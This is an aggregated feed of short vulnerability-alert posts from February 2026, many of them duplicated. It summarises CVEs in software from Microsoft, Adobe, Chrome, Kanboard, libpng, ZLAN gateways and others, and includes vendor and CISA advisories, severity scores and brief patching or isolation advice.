#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25924 - High (8.4)
Kanboard is project management software focused on Kanban methodology. Prior to 1.2.50, a security control bypass vulnerability in Kanboard allows an authenticated administrator to achieve full Remote Code Execution (RCE). Although the application...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25924/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:16:19.097000
2 posts
🟠 CVE-2026-25759 - High (8.7)
Statmatic is a Laravel and Git powered content management system (CMS). From 6.0.0 to before 6.2.3, a stored XSS vulnerability in content titles allows authenticated users with content creation permissions to inject malicious JavaScript that execu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25759/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25759 - High (8.7)
Statmatic is a Laravel and Git powered content management system (CMS). From 6.0.0 to before 6.2.3, a stored XSS vulnerability in content titles allows authenticated users with content creation permissions to inject malicious JavaScript that execu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25759/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T21:16:17.757000
2 posts
🟠 CVE-2025-64487 - High (7.6)
Outline is a service that allows for collaborative documentation. Prior to 1.1.0, a privilege escalation vulnerability exists in the Outline document management system due to inconsistent authorization checks between user and group membership mana...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-64487/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-64487 - High (7.6)
Outline is a service that allows for collaborative documentation. Prior to 1.1.0, a privilege escalation vulnerability exists in the Outline document management system due to inconsistent authorization checks between user and group membership mana...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-64487/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T20:36:58.373000
2 posts
🟠 CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21246 - High (7.8)
Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21246/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T19:49:34.573000
2 posts
🟠 CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21250 - High (7.8)
Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21250/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T19:15:51.427000
2 posts
🟠 CVE-2026-2314 - High (8.8)
Heap buffer overflow in Codecs in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2314/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2314 - High (8.8)
Heap buffer overflow in Codecs in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2314/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T19:12:00.613000
2 posts
🟠 CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T19:10:20.090000
2 posts
🟠 CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21260 - High (7.5)
Exposure of sensitive information to an unauthorized actor in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:56:56.907000
2 posts
🟠 CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:32:31
2 posts
🟠 CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:31:37
2 posts
🟠 CVE-2026-2360 - High (8)
PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2360/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2360 - High (8)
PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a custom operator in the public schema and place malicious code in that operator. This operator will later be executed with superuser privil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2360/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:31:37
2 posts
Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##updated 2026-02-11T18:24:46.720000
1 posts
🟠 CVE-2026-23715 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds write vulnerability while parsing specially crafted XDB files. This ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23715/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:24:30.713000
1 posts
🟠 CVE-2026-23716 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:24:15.437000
1 posts
🟠 CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:24:00.490000
2 posts
🟠 CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23718 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23718/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:16:08.313000
2 posts
🟠 CVE-2026-2361 - High (8)
PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a temporary view based on a function containing malicious code. When the anon.get_tablesample_ratio function is then called, the malicious c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2361/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2361 - High (8)
PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a temporary view based on a function containing malicious code. When the anon.get_tablesample_ratio function is then called, the malicious c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2361/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:16:07.720000
2 posts
Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##updated 2026-02-11T18:06:04.010000
2 posts
🔴 CVE-2025-64075 - Critical (10)
A path traversal vulnerability in the check_token function of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to bypass authentication and perform administrative actions by supplying a crafted session cookie value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-64075/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-64075 - Critical (10)
A path traversal vulnerability in the check_token function of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to bypass authentication and perform administrative actions by supplying a crafted session cookie value.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-64075/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:06:04.010000
4 posts
🔴 CVE-2026-25084 - Critical (9.8)
Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25084/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
🔴 CVE-2026-25084 - Critical (9.8)
Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25084/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
updated 2026-02-11T18:06:04.010000
4 posts
🔴 CVE-2026-24789 - Critical (9.8)
An unprotected API endpoint allows an attacker to remotely change the device password without providing authentication.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24789/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
🔴 CVE-2026-24789 - Critical (9.8)
An unprotected API endpoint allows an attacker to remotely change the device password without providing authentication.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24789/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
updated 2026-02-11T17:58:50.067000
1 posts
🟠 CVE-2026-23720 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted NDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:39:54.840000
2 posts
🟠 CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:37:29.543000
2 posts
🟠 CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21321 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21321/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:37:04.913000
2 posts
🟠 CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21323 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21323/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:36:45.697000
2 posts
🟠 CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21324 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21324/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:36:27.173000
2 posts
🟠 CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:31:16.753000
2 posts
🟠 CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21335 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21335/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:15:24.487000
2 posts
🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T17:15:14.187000
2 posts
🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T16:40:22.233000
2 posts
🟠 CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T16:16:06.403000
1 posts
libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
updated 2026-02-11T16:16:06.200000
2 posts
🟠 CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25577 - High (7.5)
Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticate...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25577/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T16:16:03.583000
1 posts
🚨 CVE-2026-1235: CRITICAL deserialization flaw in WP eCommerce (≤3.15.1) allows unauthenticated PHP object injection via AJAX. No patch yet. Disable vulnerable AJAX actions & audit plugins. High risk for EU e-commerce sites. https://radar.offseq.com/threat/cve-2026-1235-cwe-502-deserialization-of-untrusted-67de3834 #OffSeq #WordPress #Security
##updated 2026-02-11T15:57:42.060000
2 posts
🟠 CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T15:43:43.057000
10 posts
Critical Windows RasMan Zero-Day Exploited: February 2026 Patch Released
Microsoft has urgently released security updates on February 10, 2026, to fix a critical zero-day vulnerability in the Windows Remote Access Connection Manager (RasMan) service. This flaw, tracked as CVE-2026-21525, is actively exploited in the wild, enabling attackers to crash systems and disrupt remote connections—a serious concern for organizations relying on VPNs, remote desktops, and other…
https://undercodenews.com/critical-windows-rasman-zero-day-exploited-february-2026-patch-released/
##🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
